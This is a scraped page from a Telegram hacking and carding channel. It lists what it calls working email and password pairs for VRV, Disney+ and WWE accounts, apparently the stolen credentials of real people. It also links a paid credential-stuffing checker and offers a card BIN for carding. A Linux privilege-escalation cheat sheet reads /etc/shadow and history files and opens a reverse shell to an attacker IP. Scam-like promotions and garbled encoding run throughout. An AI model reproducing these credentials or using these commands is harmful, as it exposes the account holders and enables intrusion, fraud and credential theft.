BLACK HAT ๐ŸŽฉ๐ŸŽฉ
772 subscribers
14 photos
1 video
9 files
89 links
Modded apps ๐Ÿ“ณ
Leaked Courses ๐Ÿ“š
Hacking for begainers ๐ŸŽฉ
Carding & cracking tutorials and tips
Download Telegram
Subscribe Karo
Forwarded from Bollywood HD Movies
Please open Telegram to view this post
VIEW IN TELEGRAM
Hello friends
BLACK HAT ๐ŸŽฉ๐ŸŽฉ:
Wireless and Mobile Networks Security

๐Ÿ”ฐGoogle SEO Secret Guide๐Ÿ”ฐ

Share And Support Us โค๏ธ

How to make a professional interactive telegram bot for free ๐Ÿค™

Here we gonna discuss how we can make and deploy a telegram bot from complete scratch

You donโ€™t need to write any code for this. In fact, you donโ€™t even need your computer!


Link ๐Ÿ–‡๏ธ๐Ÿ‘‡
https://bit.ly/2KX4usd


Share and support us ๐Ÿ˜Œโค๏ธ


t.me//blackhat504

Complete Cyber Security Masterclass: Beginner to Advance

Learn Cyber Security like a professional hacker! Start as a beginner and go all the way to launching cyber attacks.

https://www.udemy.com/course/complete-cyber-security-masterclass-beginner-to-advance/?Join-@UdemyFree4You&couponCode=JUNAAR

Sสœแด€ส€แด‡ แด€ษดแด… sแดœแด˜แด˜แดส€แด› แดœs๐Ÿ‘‡
๐Ÿ†” @blackhat504

๐Ÿ’ขTERMUX ADVANCE GUIDE๐Ÿ’ข

๐Ÿ”ฐUltimate Guide To Ethical Hacking With Termux๐Ÿ”ฐ

LINK๐Ÿ‘‡

https://play.google.com/store/apps/details?id=com.androidexample.termux

Share & Support Usโค๏ธ

โšœJOIN FOR MOREโšœ
โž–@blackhat504โž–

๐Ÿ”ฅ 10ร—VRV HITS OPEN ๐Ÿ”ฅ

jeter.joshua90@yahoo.com:jstead1990 | Subs = [VRV Premium Bundle]

hestandaj@yahoo.com:Spartan213 | Subs = [VRV Premium Bundle]

Ilianarosa15@yahoo.com:Hawknation1 | Subs = [VRV Premium Bundle]

ben_joe_38@hotmail.com:12qwaszx | Subs = [VRV Premium Bundle]

jbalderas19@yahoo.com:KatyPerry12 | Subs = [VRV Premium Bundle]

juanpa15gutierrez@gmail.com:car1bib2J | Subs = [VRV Premium Bundle]

chrischenalien@gmail.com:Chris11235 | Subs = [VRV Premium Bundle]

germannetro1@icloud.com:Dwgon4530 | Subs = [VRV Premium Bundle]

yanetlopez714@gmail.com:yanet137 | Subs = [VRV Premium Bundle]

basagarwal@yahoo.com:Nbd21403

๐Ÿ˜Networking Ebooks Collection๐Ÿ˜


โ—๏ธ Contains:-

โ—๏ธInfo About firewall

โ—๏ธOSI/TCP

โ—๏ธNetwork basics

โ—๏ธSecurity ETC

โ—๏ธMuch more....

Link:-
https://download.itadmins.net/Networking/

โค๏ธJOIN US FOR MORE UPDATESโค๏ธ

โž–@BlackHat_Hacking โž–

โšœJOIN FOR MOREโšœ
โž–@blackhat504โž–

๐™๐™๐™š ๐™‡๐™ž๐™ฃ๐™ช๐™ญ ๐™‹๐™ง๐™ž๐™ซ๐™ž๐™ก๐™š๐™œ๐™š ๐™€๐™จ๐™˜๐™–๐™ก๐™–๐™ฉ๐™ž๐™ค๐™ฃ ๐˜พ๐™๐™š๐™–๐™ฉ๐™จ๐™๐™š๐™š๐™ฉ

Operating System
What's the distribution type? What version?

cat /etc/issue
cat /etc/*-release
cat /etc/lsb-release


What's the kernel version? Is it 64-bit?

cat /proc/version
uname -a
uname -mrs
rpm -q kernel
dmesg | grep Linux
ls /boot | grep vmlinuz-

What can be learnt from the environmental variables?

cat /etc/profile
cat /etc/bashrc
cat ~/.bash_profile
cat ~/.bashrc
cat ~/.bash_logout
env
set

Is there a printer?

lpstat -a

Applications & Services

What services are running? Which service has which user privilege?

ps aux
ps -ef
top
cat /etc/services

Which service(s) are been running by root? Of these services, which are vulnerable

ps aux | grep root
ps -ef | grep root

What applications are installed? What version are they? Are they currently running?

ls -alh /usr/bin/
ls -alh /sbin/
dpkg -l
rpm -qa
ls -alh /var/cache/apt/archivesO
ls -alh /var/cache/yum/

Any of the service(s) settings misconfigured? Are any (vulnerable) plugins attached?

cat /etc/syslog.conf
cat /etc/chttp.conf
cat /etc/lighttpd.conf
cat /etc/cups/cupsd.conf
cat /etc/inetd.conf
cat /etc/apache2/apache2.conf
cat /etc/my.conf
cat /etc/httpd/conf/httpd.conf
cat /opt/lampp/etc/httpd.conf
ls -aRl /etc/ | awk '$1 ~ /^.*r.*/

What jobs are scheduled?

crontab -l
ls -alh /var/spool/cron
ls -al /etc/ | grep cron
ls -al /etc/cron*
cat /etc/cron*
cat /etc/at.allow
cat /etc/at.deny
cat /etc/cron.allow
cat /etc/cron.deny
cat /etc/crontab
cat /etc/anacrontab
cat /var/spool/cron/crontabs/root

Any plain text usernames and/or passwords?

grep -i user [filename]
grep -i pass [filename]
grep -C 5 "password" [filename]
find . -name "*.php" -print0 | xargs -0 grep -i -n "var $password" # Joomla

Communications & Networking
What NIC(s) does the system have? Is it connected to another network?

/sbin/ifconfig -a
cat /etc/network/interfaces
cat /etc/sysconfig/network

What are the network configuration settings? What can you find out about this network? DHCP server? DNS server? Gateway?

cat /etc/resolv.conf
cat /etc/sysconfig/network
cat /etc/networks
iptables -L
hostname
dnsdomainname
What other users & hosts are communicating with the system?

lsof -i
lsof -i :80
grep 80 /etc/services
netstat -antup
netstat -antpx
netstat -tulpn
chkconfig --list
chkconfig --list | grep 3:on
last
w

Whats cached? IP and/or MAC addresses

arp -e
route
/sbin/route -nee

Is packet sniffing possible? What can be seen? Listen to live traffic

tcpdump tcp dst 192.168.1.7 80 and tcp dst 10.5.5.252 21

Note: tcpdump tcp dst [ip] [port] and tcp dst [ip] [port]

Have you got a shell? Can you interact with the system?

nc -lvp 4444 # Attacker. Input (Commands)
nc -lvp 4445 # Attacker. Ouput (Results)
telnet [attackers ip] 44444 | /bin/sh | [local ip] 44445 # On the targets system. Use the attackers IP!

Confidential Information & Users
Who are you? Who is logged in? Who has been logged in? Who else is there? Who can do what?

id
who
w
last
cat /etc/passwd | cut -d: -f1 # List of users
grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}' # List of super users
awk -F: '($3 == "0") {print}' /etc/passwd # List of super users
cat /etc/sudoers
sudo -l

What sensitive files can be found?

cat /etc/passwd
cat /etc/group
cat /etc/shadow
ls -alh /var/mail/

Anything "interesting" in the home directorie(s)? If it's possible to access

ls -ahlR /root/
ls -ahlR /home/

Are there any passwords in; scripts, databases, configuration files or log files? Default paths and locations for passwords

cat /var/apache2/config.inc
cat /var/lib/mysql/mysql/user.MYD
cat /root/anaconda-ks.cfg

What has the user being doing? Is there any password in plain text? What have they been edting?

cat ~/.bash_history
cat ~/.nano_history
cat ~/.atftp_history
cat ~/.mysql_history
cat ~/.php_history

What user information can be found?

cat ~/.bashrc
cat ~/.profile
cat /var/mail/root
cat /var/spool/mail/root

t.me//blackhat504

๐Ÿ”ฅ sMAIO MULTICHECKER [PAID TOOL] SUPPORT 60+ MODULES ๐Ÿ”ฅ

Modules :
Minecraft
NordVPN
VyprVPN
ZenMateVPN
HideMyAssVPN
ExpressVPN
Reddit
Hulu
Pornhub
CrunchyRoll
UPlay
ZorroVPN
TunnelBearVPN
IpVanishVPN
SmartProxies
Purse.io
Skinhub
PlexTV
Gyazo
Disney+
Chaturbate
WWE
Facebook
DirectTV
Instagram
myCANAL
Napster
IMVU
Duolingo
PornPortal
UFC
ROBLOX
MailAccess
AntiPublic
Wendys
PostMates
Funimation
McDonalds_US
GoDaddy
Chegg
GetUpside
RedTube
VirusTotal
Lovoo
GrubHub
OnlyFans
CallOfDutty
OVH
BuffaloWildWings
DoorDash
GFuel
WTFPass
AngelaWhite
HollyRandall
Steam
Battle.net
Acorns
SnapChat

https://www.upload.ee/files/12624926/smAIO_Multichecker.rar.html

Enjoy ๐Ÿ‘โค๏ธ

โญ๏ธ t.me//blackhat504 โญ๏ธ

๐Ÿ”ฐDisney+ Premium Accounts๐Ÿ”ฐ
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–
will.halstead@me.com:luke2twins
paulo-mlka@sfr.fr:Perfect81
dwhite38@gmail.com:dee382de
naschunke@yahoo.com:Golfer65
loan99home@gmail.com:Maddog31$
averyandmonty@gmail.com:spike007
isabelle.bayol@wanadoo.fr:Zaza1808
amiller419@twc.com:Nickym419
dollermanapsal@gmail.com:America12@
souljabalboamusic@gmail.com:Balboa1989
lamarbr@yahoo.com:Dmusique1
paubrannan@gmail.com:Newcanaan10
jessicacudd@yahoo.com:bunny7891
bretd87@gmail.com:princess88
neldridge62082@gmail.com:icecream420
jjsingh808@gmail.com:Jassie15
johanna@majorbriggs.se:Kitt2010
tasha.l.thorpe@gmail.com:aniya0619
walren@earthlink.net:Vanline1
dsdull@att.net:hunter11
jessbaumgardner@gmail.com:jess2009
peyton.dunn43@gmail.com:sunshine43
kylejohnson42011@yahoo.com:bdwvxb33
joseph.bicchieray@orange.fr:annalexa0509
rooneyhudson@aol.com:Perryhud44
austin.birdwell@gmail.com:liveordie3
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–

๐Ÿ”ฐWWE Premium Accounts๐Ÿ”ฐ
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–
deenaipaul@gmail.com:Deewowz1
justincanady1@yahoo.com:Raiders1
trinity2187@aol.com:frankie12
maria_rccrd@yahoo.com:symbouras1
jackson.andre81@gmail.com:Jackson81
sartru@hotmail.com:leannt1992
jrb092779@gmail.com:jbboom927
aimee.gusman@yahoo.com:Hot4cards
kaeseng36@gmail.com:codblackops2
tom.garone@gmail.com:lacrosse2
woodsthomas87@yahoo.com:empire4ever
bennettcassi@yahoo.com:cjb1221
c.gallardo26@yahoo.com:america86
jefferyfranklin225@yahoo.com:tiger2158
xabbiehuberx@gmail.com:uzumaki1

โž– @blackhat504โž–

https://t.me/satish_k_samal

#ONEPLUS 7 Pro ORDER PLACED SUCCESSFULL

๐Ÿ’ซ PRICE - 8,000/- ๐Ÿ’ซ
โค๏ธ 4,000 Rs Advance & 4,000 Rs After Booking โค๏ธ

DIRECT MESSAGE ME NOW TO ORDER HURRY UP โค๏ธ๐Ÿ”ฅ

DM HERE โ€” @blackhat504

โœจ๐Ÿ˜Šโค๏ธโœ…

Big loot : Truebalance Big Update

Now Sign up & do KYC Easy & INSTANT and Get Rs.50/

https://tbal.io/REPCCl4sfTKkQ?src=W&b=rne

Download the app , Register And Do Kyc Instantly You will Get 50 Rs.

No need Credit Score. Just kyc & Get 50 Rs

You Can Recharge Your Money or Withdrawal to bank

Bank transfer Process - Open App Select Gold Click Enter Number

Then Enter To Amount โ‚น50 Then Buy Gold

Now Sell Your gold after 5 Days In Bank account. @blackhat504

https://t.me/satish_k_samal

๐Ÿ”ฐ BIN MICROSOFT 365 ๐Ÿ”ฐ

๐Ÿ“ค| BIN: 518919763789xxxx
๐Ÿ“ค| FECHA: rnd
๐Ÿ“ค| CVV: rnd
๐Ÿ“ฎ| IP: USA๐Ÿ‡บ๐Ÿ‡ธ

โœณ๏ธ Credit: Mr Rahim

๐Ÿงฌ| LINK: https://www.microsoft.com/en-us/microsoft-365/try

https://t.me/the_whicher

Full screen hd WhatsApp status video channel link
@satish_k_samal join karo

https://t.me/the_whicher

https://t.me/the_whicher

https://t.me/the_whicher

https://t.me/the_whicher

@satish_k_samal

@satish_k_samal

@the_whicher

Only free fire gaming
Subscribe Karo my telegram account ko
https://t.me/freefiregaming00

Free followers and likes!
Download the app on https://topfollow.app/

Type this code to gain extra coins: EA040D08

https://t.me/the_whicher

*โž• USEFUL WEBSITES FOR PENTESTERS & HACKERS โž•*

Exploits Database ๐Ÿ’ฅ

http://www.exploit-db.com/
http://www.intelligentexploit.com
http://www.shodanhq.com/
http://packetstormsecurity.com/

Vulnerabilities Database ๐ŸŽฏ

https://cve.mitre.org/cve/
http://www.cvedetails.com/
https://nvd.nist.gov/
http://osvdb.org/
https://www.kb.cert.org/vuls/
https://secunia.com/community/advisories/search/
http://www.securityfocus.com/bid
http://lwn.net/Vulnerabilities/
http://denimgroup.com/resources-threadfix/
http://www.vulnerability-lab.com
http://www.secdocs.org/

Hacking Tutorials ๐Ÿ’ป

https://www.offensive-security.com/
http://www.kalitutorials.net/2013/08/kali-linux.html
https://www.youtube.com/user/DEFCONConference
https://www.youtube.com/user/Hak5Darren
https://www.youtube.com/user/sansinstitute
https://en.wikibooks.org/wiki/Metasploit/VideoTutorials
http://www.hacking-tutorial.com/
http://breakthesecurity.cysecurity.org/
http://www.securitytube.net/
http://www.ehacking.net/
https://vimeo.com/channels/fullscopesecurity
http://www.spacerogue.net/wordpress/

Virus Scan ๐Ÿฆ 

https://www.virustotal.com/nl/
http://anubis.iseclab.org/
http://virusscan.jotti.org/it

--Not distribute to AV--

http://v2.scan.majyx.net/?page=home
http://fuckingscan.me/
https://anonscanner.com/
http://nodistribute.com/
http://www.file2scan.net/

Tools Download ๐Ÿ› 

http://tools.kali.org/tools-listing
http://insecure.org/
http://www.hackersonlineclub.com/hacking-tools
https://www.concise-courses.com/hacking-tools/
http://www.darknet.org.uk/category/hacking-tools/
http://www.kitploit.com/
http://www.toolswatch.org/
http://www.blackarch.org/tools.html
https://pentest-tools.com/reconnaissance/google-hacking
https://gexos.github.io/Hacking-Tools-Repository/
http://www.romhacking.net/utilities/

Network Online Tools ๐ŸŒ

http://www.yougetsignal.com/
http://www.dnswatch.info/
http://www.nirsoft.net/countryip/
http://www.tcpiputils.com/
http://www.coffer.com/mac_find/
http://bgp.he.net/
http://www.sockets.com/services.htm
http://services.ce3c.be/ciprg/

IP Lookup ๐Ÿ”Ž

http://ip-api.com/#
http://www.my-ip-neighbors.com/
http://www.whatismyip.com/
http://www.ip2location.com/demo
http://freegeoip.net/static/index.html
http://whatstheirip.com
http://ipaddress.com
http://www.ip-adress.com/ipaddresstolocation/

Encrypt / Decrypt โ›“

http://crypo.in.ua/tools/
http://www.tools4noobs.com/online_tools/decrypt/
http://codebeautify.org/encrypt-decrypt
http://textmechanic.com/Encryption-Generator.html
http://www.yellowpipe.com/yis/tools/encrypter/

Online Hash Crackers ๐Ÿงฑ
https://youtube.com/channel/UCm6NizNjOcA8fc2Bdafqbgw subscribe Karo my YouTube channel ko please
Addicted to Games? Want to make some cash out of it?? Try out League War Official, eSports platform. Join Daily Matches & Get Rewards on Each Kill you score.
Get Huge Prize on Getting Chicken Dinner. Just Download League War Official Android App & Register using the PromoCode given Below to Get 10 PlayCoins Free Signup Bonus.

Download Link: https://leaguewarofficial.in /n Promo Code: satyaparwej
Please subscribe
Ye video ko dekho maja aajaye ga https://youtu.be/ijnfyLNYrak
สœษชษช ส€แด€สœษชแด